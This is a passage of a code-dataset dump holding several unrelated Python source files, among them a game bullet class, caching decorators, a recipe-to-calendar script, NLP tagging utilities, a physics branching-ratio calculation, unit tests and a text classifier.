OutDir+'results/Moments_{}_NoFilter_day_{}_{}.npz' \\\n .format(setName,Start,End)\nOutFileT = OutDir+'results/Moments_{}_Taylor_StepX_{}_day_{}_{}.npz' \\\n .format(setName,StepX,Start,End)\n","sub_path":"LIS131/TemperatureDissipation/ConfigMoments.py","file_name":"ConfigMoments.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"652443949","text":"class Bullet(object):\n def __init__(self, x, y, direction):\n self.x = x\n self.y = y\n self.direction = direction\n\n self.speed = 5\n self._size = 5\n\n self.removed = False\n\n def copy(self):\n b = Bullet(self.x, self.y, self.direction)\n b.speed = self.speed\n b._size = self._size\n b.removed = self.removed\n return b\n\n def update(self):\n self.x += self.speed * cos(radians(self.direction))\n self.y += self.speed * sin(radians(self.direction))\n\n def render(self):\n fill(255, 0, 0)\n ellipse(self.x, self.y, self._size, self._size)\n","sub_path":"Tankgame/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600708992","text":"# -*- encoding: utf-8 -*-\n#\n# Copyright 2012 posativ . All rights reserved.\n# License: BSD Style, 2 clauses. see acrylamid/__init__.py\n\nimport os\nimport functools\n\nfrom fnmatch import fnmatch\n\n\n# Borrowed from werkzeug._internal\nclass _Missing(object):\n\n def __repr__(self):\n return 'no value'\n\n def __reduce__(self):\n return '_missing'\n\n\n# Borrowed from werkzeug.utils\nclass cached_property(object):\n \"\"\"A decorator that converts a function into a lazy property. The\n function wrapped is called the first time to retrieve the result\n and then that calculated result is used the next time you access\n the value::\n\n class Foo(object):\n\n @cached_property\n def foo(self):\n # calculate something important here\n return 42\n\n The class has to have a `__dict__` in order for this property to\n work.\n \"\"\"\n\n # implementation detail: this property is implemented as non-data\n # descriptor. non-data descriptors are only invoked if there is\n # no entry with the same name in the instance's __dict__.\n # this allows us to completely get rid of the access function call\n # overhead. If one choses to invoke __get__ by hand the property\n # will still work as expected because the lookup logic is replicated\n # in __get__ for manual invocation.\n\n def __init__(self, func, name=None, doc=None):\n self.__name__ = name or func.__name__\n self.__module__ = func.__module__\n self.__doc__ = doc or func.__doc__\n self.func = func\n self._missing = _Missing()\n\n def __get__(self, obj, type=None):\n if obj is None:\n return self\n value = obj.__dict__.get(self.__name__, self._missing)\n if value is self._missing:\n value = self.func(obj)\n obj.__dict__[self.__name__] = value\n return value\n\n\nclass memoized(object):\n \"\"\"Decorator. Caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned\n (not reevaluated).\n \"\"\"\n def __init__(self, func):\n self.func = func\n self.cache = {}\n def __call__(self, *args):\n try:\n return self.cache[args]\n except KeyError:\n value = self.func(*args)\n self.cache[args] = value\n return value\n except TypeError:\n # uncachable -- for instance, passing a list as an argument.\n # Better to not cache than to blow up entirely.\n return self.func(*args)\n def __repr__(self):\n \"\"\"Return the function's docstring.\"\"\"\n return self.func.__doc__\n def __get__(self, obj, objtype):\n \"\"\"Support instance methods.\"\"\"\n return functools.partial(self.__call__, obj)\n\n\ndef filelist(content_dir, entries_ignore=[]):\n \"\"\"Gathering all entries in content_dir except entries_ignore via fnmatch.\"\"\"\n\n flist = []\n for root, dirs, files in os.walk(content_dir):\n for f in files:\n if f[0] == '.':\n continue\n path = os.path.join(root, f)\n fn = filter(lambda p: fnmatch(path, os.path.join(content_dir, p)), entries_ignore)\n if not fn:\n flist.append(path)\n return flist\n","sub_path":"acrylamid/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242956477","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, timedelta\nfrom glob import glob\nfrom ics import Calendar, Event\nimport yaml\n\nrecipe_list = glob('recipes/*')\nfor idx, cur_file in enumerate(recipe_list):\n print('{}: {}'.format(idx, cur_file))\nprint('-' * 60)\nrecipe_path = recipe_list[int(input('Bitte Rezept auswählen:\\n'))]\nprint('#' * 60)\n\n# parse config\nwith open(recipe_path, 'r') as f:\n recipe = yaml.load(f)\nprint(recipe['name'])\nprint(recipe['url'])\n\n# read cooking steps and calculate times\nsteps = recipe['steps']\nhours = [float(steps[cur_step]['Zwischenzeit']) for cur_step in steps.keys()]\n\nwhile True:\n # user input\n szTime = input('Zeitpunkt für das fertige Brot [DD.MM. HH]:\\n')\n end_time = datetime.strptime(szTime, '%d.%m. %H').replace(year=datetime.now().year)\n print('-' * 60)\n\n # generate calendar object\n c = Calendar()\n\n # loop over every event\n for idx, cur_step in enumerate(steps.keys()):\n # get date\n date = end_time - timedelta(hours=sum(hours[idx:]))\n print('\\t{} Uhr\\t{}'.format(date.strftime('%d.%m. %H:%M'), cur_step))\n\n # save it as an event\n e = Event()\n e.name = cur_step\n e.begin = date\n e.duration = ({'minutes': 15})\n\n # write description\n e.description = ''\n if steps[cur_step]['Zutaten']:\n e.description += 'Zutaten:\\n'\n for tmp in steps[cur_step]['Zutaten']:\n e.description += tmp + '\\n'\n e.description += '\\n'\n e.description += 'Zubereitung:\\n'\n e.description += steps[cur_step]['Zubereitung'] + '\\n'\n e.description += '\\n'\n e.description += recipe['url']\n\n # save event in calendar\n c.events.append(e)\n\n # save dates?!\n if input('Daten abspeichern? [j/[n]] ') == 'j':\n break\n\n# write ics file\nwith open('Backdaten.ics', 'w') as f:\n f.writelines(c)\n","sub_path":"bread2ics.py","file_name":"bread2ics.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"220772385","text":"\nimport os, sys\nimport numpy as np\nimport six\nimport json\nimport random\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\ndef convert_to_new_length(tokens, tags, tokenizer):\n n = []\n n_tags = []\n spans = []\n for index, (token, tag) in enumerate(zip(tokens, tags)):\n spans.append([len(n), len(n)])\n for subtoken in tokenizer.tokenize(token):\n spans[-1][1] += 1\n n.append(subtoken)\n n_tags.append(tag)\n tag = 'O' if tag == 'O' else 'I'+tag[1:]\n return n, n_tags, spans\n\ndef convert_to_original_length(sentence, tags, tokenizer):\n r = []\n r_tags = []\n for index, token in enumerate(tokenizer.tokenize(sentence)):\n if token.startswith(\"##\"):\n if r:\n r[-1] = f\"{r[-1]}{token[2:]}\"\n else:\n r.append(token)\n r_tags.append(tags[index])\n return r, r_tags\n\ndef count_tag_nums(json_list, count_tags={'B', 'I'}):\n count = defaultdict(int)\n for item in json_list:\n for tag in item['slot_tags']:\n if tag[0] in count_tags:\n count[tag[:]] += 1\n return count\n\ndef sample_k_shot_slot_filling(k, json_list, count_tags={'B', 'I'}, seed=None):\n '''\n k-shot\n domain D\n label set LD\n '''\n if seed:\n random.seed(seed)\n\n D = {tuple(item['tokens']):item for item in json_list}\n D_keys = set(D)\n D_label_keys = defaultdict(set)\n key_labels = {}\n LD = set()\n for item in json_list:\n key = tuple(item['tokens'])\n labels = [tag[:] for tag in item['slot_tags'] if tag[0] in count_tags]\n key_labels[key] = labels\n LD.update(labels)\n for label in set(labels):\n D_label_keys[label].add(key)\n \n S_keys = set()\n count = {l: 0 for l in LD}\n \n all_count = count_tag_nums(json_list, count_tags=count_tags)\n for l in count:\n n = all_count.get(l, 0)\n if n < k:\n count[l] += k-n\n \n # sample\n for l in sorted(list(LD)):\n while count[l] < k:\n tmp = sorted(list(D_label_keys[l] - S_keys))\n if len(tmp) == 0:\n break\n key = random.choice(tmp)\n S_keys.add(key)\n for lj in key_labels[key]:\n count[lj] += 1\n \n # remove\n for key in sorted(list(S_keys)):\n S_keys.remove(key)\n for lj in key_labels[key]:\n count[lj] -= 1\n if any(v 0:\n not_recall = label_set - correct_set\n not_precise = pred_set - correct_set\n if not_recall or not_precise:\n print('===')\n for category, span_i, span_j in not_recall:\n print(' '.join(i_sent[span_i:span_j]), category)\n print('--')\n for category, span_i, span_j in not_precise:\n print(' '.join(i_sent[span_i:span_j]), category)\n print('===')\n \n if verbose > 0:\n print(n_correct, n_precision, n_recall)\n \n \n try:\n recall = n_correct / n_recall\n precision = n_correct / n_precision\n f1 = 2 / (1/recall + 1/precision)\n except:\n recall = precision = f1 = 0\n \n return {\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'confusion_dict': confusion_dict,\n }\n\ndef get_cls_metrics(sents, labels, preds, verbose=0):\n n_correct = n_total = 0\n confusion_dict = defaultdict(lambda: [0, 0, 0]) # n_correct, n_preds, n_labels\n for i in range((len(sents))):\n i_label = labels[i]\n i_pred = preds[i]\n i_sent = sents[i]\n \n n_total += 1\n confusion_dict[i_label][2] += 1\n confusion_dict[i_pred][1] += 1\n \n if i_label == i_pred:\n n_correct += 1\n confusion_dict[i_pred][0] += 1\n \n try:\n acc = n_correct / n_total\n except:\n acc = 0\n \n return {\n 'acc': acc,\n 'confusion_dict': confusion_dict,\n }\n \n \ndef ALL2BIO(tags):\n ret = []\n for tag in tags:\n if tag[0] == 'S':\n ret.append('B'+tag[1:])\n elif tag[0] == 'E':\n ret.append('I'+tag[1:])\n else:\n ret.append(tag)\n return ret\n\ndef BIO2BIOE(tags):\n ret = []\n for i in range(len(tags)):\n if tags[i][0] == 'I' and (i+1==len(tags) or tags[i+1]!=tags[i]):\n ret.append('E'+tags[i][1:])\n else:\n ret.append(tags[i])\n return ret\n\ndef BIO2BIOES(tags):\n ret = []\n for i in range(len(tags)):\n if tags[i][0] == 'I' and (i+1==len(tags) or tags[i+1]!=tags[i]):\n ret.append('E'+tags[i][1:])\n elif tags[i][0] == 'B' and (i+1==len(tags) or tags[i+1][0]!='I'):\n ret.append('S'+tags[i][1:])\n else:\n ret.append(tags[i])\n return ret\n\ndef strip_accents(string):\n return tokenizer.basic_tokenizer._run_strip_accents(string)\n\n\ndef tokenize_with_span(string):\n '''\n depends on tokenize\n '''\n tokens = tokenize(string)\n token_spans = []\n\n i_token = 0\n i_string = 0\n while len(token_spans) < len(tokens):\n # fix -1 at the end\n if tokens[i_token] == '[UNK]':\n token_spans.append((i_string, -1))\n i_string += 1\n i_token += 1\n continue\n \n # strip '##' to adapt BertTokenizer\n if not tokens[i_token].strip('##').startswith(string[i_string]):\n i_string += 1\n continue\n\n token_spans.append((i_string, i_string + len(tokens[i_token].strip('##'))))\n i_string += len(tokens[i_token].strip('##'))\n i_token += 1\n \n # fix -1 caused by [UNK]\n for i, span in enumerate(token_spans):\n if span[1] == -1:\n if i == len(token_spans)-1:\n token_spans[i] = (token_spans[i][0], len(string))\n else:\n token_spans[i] = (token_spans[i][0], token_spans[i+1][0])\n\n return tokens, token_spans\n\ndef get_span_dict(X):\n '''\n in: [0, 0, 0, 1, 1, 1, 0, 0, 0]\n out: {\n 0: [(0, 3), (6, 9)],\n 1: [(3, 6)],\n }\n '''\n span_dict = defaultdict(list)\n current = None\n for i, x in enumerate(X):\n if current == x:\n span_dict[x][-1][1] = i+1\n elif current != x:\n current = x\n span_dict[x].append([i, i+1])\n\n return span_dict\n\ndef tags_to_ent_tags(tags, N, M=2):\n onehot_tags = to_one_hot(tags, N)\n onehot_tags2 = onehot_tags[:, :, 1:].view(*tags.shape, (N-1)//M, M)\n onehot_tags3 = torch.cat([torch.zeros([*onehot_tags2.shape[:-1], 1])+0.1, onehot_tags2], dim=-1)\n ent_tags = onehot_tags3.argmax(-1)\n return ent_tags\n\ndef tag2span(tags, return_types=False, arbitrary_tag=True):\n '''\n IOBE\n '''\n if arbitrary_tag:\n tags = ALL2BIO(tags)\n tags = BIO2BIOE(tags)\n spans = []\n types = []\n _span = _type = None\n for i, t in enumerate(tags):\n if (t[0] == 'B' or t == 'O') and _span is not None:\n spans.append(_span)\n types.append(_type)\n _span = _type = None\n if t[0] == 'B':\n _span = [i, i+1]\n _type = t[2:]\n if t[0] == 'I':\n if _span is not None:\n _span[1] = i+1\n if t[0] == 'E':\n if _span is not None:\n _span[1] = i+1\n if _span is not None:\n spans.append(_span)\n types.append(_type)\n \n if return_types:\n return spans, types\n return spans\n\ndef combine_tags_list(tags_list):\n tags = []\n for i in range(len(tags_list[0])):\n for tag in [_tags[i] for _tags in tags_list]:\n if tag != 'O':\n tags.append(tag)\n break\n else:\n tags.append('O')\n return tags\n\ndef pad_sequences(sequences, maxlen=None, dtype='int32',\n padding='post', truncating='post', value=0.):\n\n num_samples = len(sequences)\n\n lengths = []\n for x in sequences:\n try:\n lengths.append(len(x))\n except TypeError:\n raise ValueError('`sequences` must be a list of iterables. '\n 'Found non-iterable: ' + str(x))\n\n if maxlen is None:\n maxlen = np.max(lengths)\n\n # take the sample shape from the first non empty sequence\n # checking for consistency in the main loop below.\n sample_shape = tuple()\n for s in sequences:\n if len(s) > 0:\n sample_shape = np.asarray(s).shape[1:]\n break\n\n is_dtype_str = np.issubdtype(dtype, np.str_) or np.issubdtype(dtype, np.unicode_)\n if isinstance(value, six.string_types) and dtype != object and not is_dtype_str:\n raise ValueError(\"`dtype` {} is not compatible with `value`'s type: {}\\n\"\n \"You should set `dtype=object` for variable length strings.\"\n .format(dtype, type(value)))\n\n x = np.full((num_samples, maxlen) + sample_shape, value, dtype=dtype)\n for idx, s in enumerate(sequences):\n if not len(s):\n continue # empty list/array was found\n if truncating == 'pre':\n trunc = s[-maxlen:]\n elif truncating == 'post':\n trunc = s[:maxlen]\n else:\n raise ValueError('Truncating type \"%s\" '\n 'not understood' % truncating)\n\n # check `trunc` has expected shape\n trunc = np.asarray(trunc, dtype=dtype)\n if trunc.shape[1:] != sample_shape:\n raise ValueError('Shape of sample %s of sequence at position %s '\n 'is different from expected shape %s' %\n (trunc.shape[1:], idx, sample_shape))\n\n if padding == 'post':\n x[idx, :len(trunc)] = trunc\n elif padding == 'pre':\n x[idx, -len(trunc):] = trunc\n else:\n raise ValueError('Padding type \"%s\" not understood' % padding)\n return x","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318721665","text":"from django.conf import settings\nfrom django.template.loader import render_to_string\nimport os\n\n\ntemplate_list = []\nfor template_dir in settings.TEMPLATES[0]['DIRS']:\n for dir, dirnames, filenames in os.walk(template_dir):\n for filename in filenames:\n template = os.path.join(dir, filename).replace(template_dir, '')\n template_list.append(template.lstrip('/'))\n\n\ndef test_templates_render_successfully():\n default_context = {'user': None}\n assert template_list\n for template in template_list:\n render_to_string(template, default_context)\n","sub_path":"sso/user/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"530622452","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir = \"ts2_client_rc2_2032/setup.data/image\"\n\nteamspeak_dir = \"/usr/share/teamspeak\"\n\ndef setup():\n pisitools.dosed(\"TeamSpeak\", \"%installdir%\", teamspeak_dir)\n\ndef install():\n pisitools.dobin(\"TeamSpeak\")\n pisitools.rename(\"/usr/bin/TeamSpeak\", \"teamspeak-client\")\n\n for _exe in [\"TeamSpeak.bin\", \"libborqt-6.9-qt2.3.so\", \"libHVDI.so.0.8.0\", \"libspeex.so.1.0.0\"]:\n pisitools.doexe(_exe, teamspeak_dir)\n\n for _exe in [\"client_sdk/tsControl\", \"client_sdk/libTSRemote.so.0.4\"]:\n pisitools.doexe(_exe, \"%s/client_sdk\" % teamspeak_dir)\n\n for files in [\"client_sdk/tsControl.dpr\", \"client_sdk/TsRemoteImport.pas\"]:\n pisitools.insinto(\"%s/client_sdk\" % teamspeak_dir, files)\n\n pisitools.insinto(\"%s/sounds\" % teamspeak_dir, \"sounds/*\")\n\n pisitools.insinto(\"/usr/share/doc/%s/html/manual\" % get.srcTAG(), \"manual/*\")\n pisitools.dosym(\"/usr/share/doc/%s/html/manual\" % get.srcTAG(), \"%s/manual\" % teamspeak_dir)\n\n pisitools.dodoc(\"*.txt\", \"client_sdk/*.txt\")\n","sub_path":"2009/devel/network/voip/teamspeak-client/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"171824903","text":"from __future__ import division\nfrom scipy.integrate import quad\nfrom array import array\nfrom options import *\n\ndef phsp2bodyTauToN(pp):\n # Assuming the hadron is a pion\n MN = pp.MN\n MTau = pp.masses[pp.name2particle['tau']]\n MPi = pp.masses[pp.name2particle['pi']]\n if MN*(MN+2.*MPi) > (MTau**2. - MPi**2.):\n return 0.\n p1 = ( (1. - MN**2./MTau**2.)**2. - (MPi**2./MTau**2.)*(1. + MN**2./MTau**2.) )\n p2 = ( 1. - ( (MPi-MN)**2./MTau**2. ) )\n p3 = ( 1. - ( (MPi+MN)**2./MTau**2. ) )\n p4 = math.sqrt(p2*p3)\n return p1*p3\n\ndef phsp3bodyTauToN(EN, pp, lepton):\n MN = pp.MN\n if ENMTau-ML:\n return 0.\n #if EN > MTau/2.:\n # return 0.\n p1 = ( 1. - ML**2./(MTau**2.+MN**2.-2.*EN*MTau) )**2.\n p2 = math.sqrt(EN**2. - MN**2.)\n p3 = (MTau-EN) * (1.- (MN**2.+ML**2.)/MTau**2.)\n p4 = ( 1.- ML**2./(MTau**2.+MN**2.-2.*EN*MTau) ) * ( (MTau-EN)**2./MTau + (EN**2.-MN**2.)/(3.*MTau) )\n #print EN, p1, p2, (p3-p4), p3, p4\n return math.fabs(p1*p2*(p3-p4))\n\ndef EMax3body(pp, lepton):\n MTau = pp.masses[pp.name2particle['tau']]\n ML = pp.masses[pp.name2particle[lepton]]\n MN = pp.MN\n PNMax = (0.5/MTau) * math.sqrt( (MTau**2. - (ML+MN)**2.) * (MTau**2. - (ML-MN)**2.) )\n ENMax = math.sqrt( MN**2. + PNMax**2. )\n return ENMax\n\n\n\ndef integrate3bodyTauToN(pp, lepton):\n EMin = pp.MN\n #EMax = pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle[lepton]]\n #EMax = math.sqrt(((EMax**2-pp.MN**2)/2.)**2+pp.MN**2)\n\n #EMax = pp.masses[pp.name2particle['tau']] * 0.5\n EMax = EMax3body(pp,lepton)\n if EMin >= EMax:\n return 0.\n #print EMin, EMax\n integral = quad(phsp3bodyTauToN,\n EMin, EMax,\n args=(pp, lepton),\n full_output=True)\n #print integral\n return integral[0]\n\ndef brTauToPiN(pp):\n # Assuming the hadron is a pion\n if pp.MN >= (pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle['pi']]):\n return 0.\n const = (pp.tauTau/pp.hGeV) * pp.U2[2] * pp.GF**2. * pp.CKM.Vud**2. * pp.fpi**2. * pp.masses[pp.name2particle['tau']]**3. * (1./(16.*math.pi))\n ps = phsp2bodyTauToN(pp)\n return const*ps*2. #majorana\n\ndef brTauToNuEllN(pp, lepton):\n if pp.MN >= (pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle[lepton]]):\n return 0.\n const = (pp.tauTau/pp.hGeV) * pp.U2[2] * pp.GF**2. * pp.masses[pp.name2particle['tau']]**2. * (1./(4.*math.pi**3.))\n ps = integrate3bodyTauToN(pp, lepton)\n return const*ps*2. #majorana\n\n\n\ncSaver = []\n\n\nif __name__ == '__main__':\n pp = physicsParameters()\n pp.setNCoupling([0.02e-8,0.25e-8,1.e-8])\n #m = np.linspace(0,pp.masses[pp.name2particle['tau']]-pp.masses[pp.name2particle['e']],100).tolist()\n m = np.logspace(-3., math.log10(pp.masses[pp.name2particle['tau']]-pp.masses[pp.name2particle['e']]), 100).tolist()\n bre3, brmu3, brpi2, sumFromTau, brFromMu, brFromE = [], [], [], [], [], []\n #m.remove(m[0])\n m.remove(m[-1])\n for mass in m:\n pp.setNMass(mass)\n pp.setNCoupling([0.02e-8,0.25e-8,1.e-8])\n adj = (pp.nDs/pp.nTotCharm)*0.0543 #br(Ds->taunu)\n bre3.append(brTauToNuEllN(pp,'e')*adj)\n brmu3.append(brTauToNuEllN(pp,'mu')*adj)\n brpi2.append(brTauToPiN(pp)*adj)\n sumFromTau.append(adj*(brTauToPiN(pp)+brTauToNuEllN(pp,'e')+brTauToNuEllN(pp,'mu')))\n pp.setNCoupling([(0.25*0.25)*1.e-8,1.e-8,0.25e-8])\n pp.computeProductionWeights('mu')\n adj = (pp.nDs + (pp.nD+pp.nD0)*pp.w3body['mu']) / pp.nTotCharm\n brFromMu.append(pp.computeNProdBR(1)*adj)\n pp.setNCoupling([1.e-8,0.02e-8,0.02e-8])\n pp.computeProductionWeights('e')\n adj = (pp.nDs + (pp.nD+pp.nD0)*pp.w3body['e']) / pp.nTotCharm\n brFromE.append(pp.computeNProdBR(0)*adj)\n gre3 = r.TGraph(len(m), array('f',m), array('f',bre3))\n grmu3 = r.TGraph(len(m), array('f',m), array('f',brmu3))\n grpi2 = r.TGraph(len(m), array('f',m), array('f',brpi2))\n gre = r.TGraph(len(m), array('f',m), array('f',brFromE))\n grmu = r.TGraph(len(m), array('f',m), array('f',brFromMu))\n grtau = r.TGraph(len(m), array('f',m), array('f',sumFromTau))\n grtau.SetLineColor(r.kPink-9)\n grtau.SetMarkerColor(r.kPink-9)\n gre3.SetLineColor(r.kRed)\n grmu3.SetLineColor(r.kBlue)\n gre.SetLineColor(r.kMagenta+3)\n grmu.SetLineColor(r.kMagenta+3)\n gre.SetLineWidth(2)\n grmu.SetLineWidth(2)\n grtau.SetLineWidth(2)\n gre.SetMarkerColor(r.kMagenta+3)\n grmu.SetMarkerColor(r.kMagenta+3)\n gre.SetLineStyle(2)\n grmu.SetLineStyle(9)\n grpi2.SetLineColor(r.kBlack)\n gre3.SetMarkerColor(r.kRed)\n grmu3.SetMarkerColor(r.kBlue)\n grpi2.SetMarkerColor(r.kBlack)\n gre3.SetLineWidth(2)\n grmu3.SetLineWidth(2)\n grpi2.SetLineWidth(2)\n mgr = r.TMultiGraph()\n mgr.SetTitle('HNL production from #tau flavour')\n mgr.Add(gre3)\n mgr.Add(grmu3)\n mgr.Add(grpi2)\n mgr.Add(grtau)\n mgr.Add(gre)\n mgr.Add(grmu)\n c1 = r.TCanvas()\n cSaver.append(c1)\n c1.SetLogy()\n c1.SetLogx()\n c1.SetGrid()\n mgr.Draw('alp')\n mgr.GetXaxis().SetTitle('HNL mass (GeV)')\n mgr.GetXaxis().SetRangeUser(0.01,1.77)\n mgr.GetYaxis().SetTitle('Production BR')\n mgr.GetYaxis().SetRangeUser(1.e-14,1.e-9)\n mgr.GetXaxis().CenterTitle()\n mgr.GetXaxis().SetTitleSize(0.06)\n mgr.GetXaxis().SetTitleOffset(0.79)\n mgr.GetYaxis().CenterTitle()\n mgr.GetYaxis().SetTitleSize(0.06)\n mgr.GetYaxis().SetTitleOffset(0.78)\n leg = r.TLegend(0.33,0.1,0.63,0.38)\n leg.SetFillColor(r.kWhite)\n leg.AddEntry(grpi2,'#tau #rightarrow #pi N','lp')\n leg.AddEntry(gre3,'#tau #rightarrow e #nu_{e} N','lp')\n leg.AddEntry(grmu3,'#tau #rightarrow #mu #nu_{#mu} N','lp')\n leg.AddEntry(grtau,'U_{#tau} production','lp')\n leg.AddEntry(gre,'U_{e} production','lp')\n leg.AddEntry(grmu,'U_{#mu} production','lp')\n leg.SetTextSize(0.048)\n leg.Draw()\n c1.Modified()\n c1.Update()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#def integrate3bodyTauToN(pp, lepton, nToys=1000):\n# #### Setting up the parameters for generation\n# MN = pp.MN\n# ML = pp.masses[pp.name2particle[lepton]]\n# MTau = pp.masses[pp.name2particle['tau']]\n# pTau = r.TLorentzVector(0., 0., 0., MTau)\n# masses = array('d', [0., ML, MN])\n# event = r.TGenPhaseSpace()\n# event.SetDecay(pTau, 3, masses)\n# \n# Nq2 = 20 \n# NEN = 20\n# ENMax = (mH-mh)\n# ENMax = r.TMath.Sqrt(((ENMax**2-ml**2-mN**2)/2.)**2+mN**2)\n# hist = r.TH2F(\"hist\", \"\", Nq2, (ml+mN)**2, (mH-mh)**2, NEN, mN, ENMax)\n#\n# ###### Integral\n# Integral = 0.\n#\n# #### For loop in order to integrate\n# for i in xrange(nToys):\n# event.Generate()\n# #### Getting momentum of the daughters\n# ph = event.GetDecay(0)\n# pN = event.GetDecay(1)\n# pl = event.GetDecay(2)\n# #### Computing the parameters to compute the phase space\n# q = pl+pN\n# q2 = q.M2()\n# EN = pN.E()\n#\n# iBin = hist.Fill(q2, EN)\n# \n# if hist.GetBinContent(iBin)==1.:\n# val = PhaseSpace3Body(q2, EN, mH, mh, mN, ml)\n# Integral+=val*hist.GetXaxis().GetBinWidth(1)*hist.GetYaxis().GetBinWidth(1)\n#\n# hist.Delete()\n# return {'Int':Integral, \"PHSP\":hist}\n# pass\n","sub_path":"tauToN.py","file_name":"tauToN.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"653694825","text":"'''\ndef findit(str1,str2):\n count=0\n length=len(str1)\n for sublen in range(length,0,-1):\n for start in range(0,length-sublen+1):\n subst= str1[start:start+sublen]\n count+=1\n if str2.find(subst) >-1:\n return subst\n\nprint(findit(\"aljsrtylgalg\",\"aaaajsrtydjdmdm\"))\n'''\n\"\"\"\naljsrtylgalg 0\naljsrtylgal 1\naljsrtylga 2\naljsrtylg 3\n\ndef both(substr, s):\n '''\n 求2个字符串的最长公共子串\n abcdef\n '''\n length = len(substr)\n s = str(s)\n g = { substr[i:j] for i in range(length) for j in range(length, 0, -1)}\n\n def compare(g, s):\n return max([ i for i in g if i in s], key=len)\n\n return compare(g, s)\n\nprint(both('f', 'xbc de fghi'))\n\n\"\"\"\ndef findit(str1,str2):\n count=0\n length=len(str1)\n for sublen in range(length,0,-1):\n interval=length-sublen\n for k in range(0,interval+1):\n if str2.find(str1[k:k+sublen]) !=-1:\n return str1[k:k+sublen]\n\n\nprint(findit(\"aljsralg\",\"aaaajjjsradmdm\"))","sub_path":"数据结构/作用域/fuzhong_查找字符串的公共子串_1.py","file_name":"fuzhong_查找字符串的公共子串_1.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"176578421","text":"from unittest import TestCase\nfrom Testing.unit_tests.activities import eat, nap, is_funny\n\n\nclass ActivityTests(TestCase):\n\tdef test_eat_healthy(self):\n\t\tself.assertEqual(\n\t\t\t# testiram kada je is_healthy == True\n\t\t\teat(\"broccoli\", is_healthy=True),\n\t\t\t\"I am eating a broccoli, its healthy...\"\n\t\t)\n\n\tdef test_eat_unhealthy(self):\n\t\tself.assertEqual(\n\t\t\t# testiram kada je is_healthy == False\n\t\t\teat(\"pizza\", is_healthy=False),\n\t\t\t\"I am eating pizza, because I love it!\"\n\t\t)\n\n\tdef test_short_nap(self):\n\t\tself.assertEqual(\n\t\t\tnap(1),\n\t\t\t\"I am feeling refreshed after my 1 hour nap\"\n\t\t)\n\n\tdef test_long_nap(self):\n\t\tself.assertEqual(\n\t\t\tnap(3),\n\t\t\t\"Ugh I overslept. I dont like it!\"\n\t\t)\n\n\tdef test_is_funny_tim(self):\n\t\tself.assertEqual(is_funny(\"Tim\"), True)\n\t\t# isto ce raditi oba coda\n\t\tself.assertFalse(is_funny(\"Milan\"), \"Ovo je opciona poruka\")\n\n\tdef test_is_funny_anyone_else(self):\n\t\tself.assertTrue(is_funny(\"blue\"), \"blue is funny\")\n\t\tself.assertTrue(is_funny(\"pera\"), \"crazy kure\")\n\t\tself.assertTrue(is_funny(\"putin\"), \"crazy russian\")","sub_path":"Testing/unit_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"421594732","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.figure import Figure\r\nfrom os.path import join, dirname, realpath\r\nimport io\r\n\r\nif __name__=='__main__':\r\n data = pd.read_csv(\"train1.csv\")\r\n col = ['business','entertainment','politics','sport','tech']\r\n #Data Pre-Processing\r\n le_category = LabelEncoder()\r\n data['Encoded_Label'] = le_category.fit_transform(data.category)\r\n ohe_category = OneHotEncoder()\r\n temp = ohe_category.fit_transform(data.Encoded_Label.values.reshape(-1,1)).toarray()\r\n dataOneHot = pd.DataFrame(temp, columns = col)\r\n data = pd.concat([data, dataOneHot], axis=1)\r\n vector = TfidfVectorizer(stop_words='english')\r\n data_features = vector.fit_transform(data.iloc[:,1])\r\n filename='vect'\r\n pickle.dump(vector, open(filename, 'wb'))\r\n x_train, x_test, log_train, log_test = train_test_split(data_features, data.iloc[:,[3,4,5,6,7]], test_size=0.2)\r\n\r\n #Logistic Regression\r\n print(\"\\n Logistic Regression 